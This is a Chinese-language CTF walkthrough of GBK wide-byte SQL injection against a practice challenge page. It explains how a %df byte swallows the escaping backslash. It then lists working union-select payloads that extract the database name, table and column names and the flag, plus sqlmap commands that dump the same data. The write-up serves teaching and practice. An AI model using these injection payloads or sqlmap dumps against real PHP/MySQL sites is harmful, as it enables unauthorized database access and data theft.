宽字节注入

GBK注射

---

宽字节注入

**

在使用PHP连接MySQL的时候，当设置“set
character_set_client = gbk”时会导致一个编码转换的问题，也就是我们熟悉的宽字节注入，当存在宽字节注入的时候，注入参数里带入％ DF％27，即可把（％5C）吃掉，举个例子。

**

---

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
  

  
1

当提交

id=1' and 1=1%23
  

  
1

时，MySQL的运行的SQL语句为

select * from user where  id ='1\' and 1=1#'
  

  
1

很明显这是没有注入成功的，而当我们提交

id=1%df' and 1=1%23
  

  
1

MySQL的运行的SQL语句为

select * from user where id ='1運' and 1=1#'
  

  
1

我们这里的宽字节注入是利用的MySQL的一个特性，MySQL的在使用GBK编码的时候，会认为两个字符是一个汉字（前一个ASCII码要大于128，才到汉字的范围）。这就是MySQL的的特性，因为GBK是多字节编码，他认为两个字节代表一个汉字，所以％DF和后面的\也就是％5c中变成了一个汉字“运”，而“逃逸了出来。

我用了手工注入和SqlMap的工具注入，先讲一下手工注入吧

1.手工注入

接着上面的，我们继续进行注入

id=%df%27%20union%20select%201,%20database()%23
  

  
1

---

爆出数据库之后，我们继续进行注入，爆出表

id=%df%27 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()%23
  

  
1

接下来我们就一个试一下每一个表，在这里我就省略了哈，直接给你们看一下爆出ctf4中表的内容的过程

---

下面是我第一次爆表的语句

id=%df%27 union select 1,group_concat(column_name)from information_schema.columns where table_name=ctf4%23
  

  
1

**没想到报错了，想了很长时间，难道还是过滤字符\搞得鬼？试着把字符转换成十六进制？ctf4转16进制为0x63746634，转换网址
将ctf4转换之后再进行注入**

id=%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634%23
  

  
1

爆出了两列，下面在获取flag的内容

id=%df%27 union select 1,group_concat(flag) from ctf4%23
  

  
1

不出错这个应该就是了吧

2.工具注入

**注入工具我直接放过程状语从句：查询查询结果了啊
爆出当前数据库**

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' --current-db
  

  
1

爆出此数据库下的所有表

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover --tables
  

  
1

爆出ctf4下面的所有列

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover -T ctf4 --columns
  

  
1

爆出旗中的内容

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df' -T sae-chinalover -T ctf4 -C flag --dump
  

  
1

获取成功哈